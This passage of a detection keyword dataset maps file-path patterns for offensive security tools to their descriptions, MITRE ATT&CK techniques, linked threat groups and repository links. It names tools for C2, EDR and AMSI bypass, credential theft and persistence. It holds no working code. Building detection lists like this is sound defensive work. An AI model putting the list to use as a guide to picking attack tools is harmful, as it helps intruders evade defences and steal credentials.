- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/PackMyPayload.git*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*/PackMyPayload/*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*/pacu.git*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/padre/pkg/exploit*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*/paensy.cpp*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*/papacat.zip*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,1,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*/paranoidninja/*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*/parrot/iso/*.iso*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/parrot-mirror/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/parrot-on-docker/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/parrotsec/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ParsedMalleableData.txt*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*/pass_gen.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/PassDetective.git*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*/passhash.sl*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*/passive_sqli.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/passwd_tracer.c*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/password/mimipenguin/*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/password_brute.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/patchfinder64.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PatchingAPI.cpp*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/PatchingAPI.exe*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/path_traversal.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/path_traversal_win32.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/path-mtu.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/payload_scripts*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/payload_scripts/artifact*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/payload_service.sh*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Payload_Type/athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Payload_Types/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/payload2.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/payloads/DllLdr/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/payloads/payloads.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/payloads/util*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/pcanywhere-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pcworx-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/PDF_Payload/script.txt*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/pe/dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PE/InjectPE.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/pe_to_shellcode*,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,1,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z -*/pe2shc.exe*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/pe2shc/*,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,1,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z -*/PEASS-ng.git*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/PEASS-ng/*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/PeerToPeerService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/peinjector*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/peinjector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/pentest*,offensive_tool_keyword,_,pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/PE-Obfuscator*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*/perf_swevent64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/persist.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/PersistBOF/*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/Persistence.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/Persistence.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/persistence/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 